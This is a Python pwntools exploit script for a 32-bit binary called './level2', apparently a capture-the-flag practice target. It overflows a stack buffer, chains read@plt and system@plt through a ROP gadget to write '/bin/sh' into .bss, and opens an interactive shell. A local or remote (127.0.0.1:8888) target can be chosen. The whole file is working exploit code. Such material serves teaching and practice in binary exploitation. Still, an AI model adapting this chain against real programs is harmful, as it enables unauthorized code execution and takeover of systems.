from pwn import *
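"""
ret2plt exploit for ./level2 (32-bit, ROP chain built with pwntools).

Chain: overflow the stack buffer, call read@plt to pull "/bin/sh\0" into a
writable .bss address, pop read()'s three arguments with a pop;pop;pop;ret
gadget, then call system@plt on that address.
"""

flag = True  # True: run ./level2 locally under pwntools; False: attack the remote service

# The ELF is needed on both paths (PLT entries and the .bss address come from
# it), so load it before choosing local vs. remote.  Loading it only in the
# local branch left `elf` undefined when flag is False (NameError on elf.bss()).
elf = ELF('./level2')

if flag:
    p = process(elf.path)
else:
    host = '127.0.0.1'
    port = 8888
    p = remote(host, port)

# Writable scratch address in .bss where the command string will be read to.
bss = elf.bss() + 0x08
# Address of a pop;pop;pop;ret gadget in ./level2, used to discard read()'s
# three arguments before returning into system@plt.  NOTE(review): this is
# binary-specific; re-verify it (e.g. with ROPgadget) if the target binary is
# rebuilt or differs from the one this exploit was written against.
pop3ret = 0x08048519
system = elf.plt['system']
read = elf.plt['read']

# Stage 1 arguments: read(0, bss, 20) -- 20 bytes is enough for "/bin/sh\0\n".
read_args = p32(0) + p32(bss) + p32(20)

# 0x8c bytes of padding reach the saved return address, then:
#   read@plt -> pop3ret (drop read's 3 args) -> system@plt -> fake ret -> &"/bin/sh"
# 0xdeadbeef is the bogus return address for system(); it is not reached while
# the spawned shell is alive.  Bytes literals are used throughout: pwntools on
# Python 3 only accepts bytes for tube I/O, and b'...' is valid on Python 2 too
# (the original 'A' * 0x8c + p32(...) raises TypeError on Python 3).
payload = (
    b'A' * 0x8c
    + p32(read) + p32(pop3ret) + read_args
    + p32(system) + p32(0xdeadbeef) + p32(bss)
)

p.recvline()                  # drain the program's first output line before sending the overflow
p.sendline(payload)
p.sendline(b"/bin/sh\x00")    # consumed by the staged read(); NUL-terminated so system() sees "/bin/sh"
p.interactive()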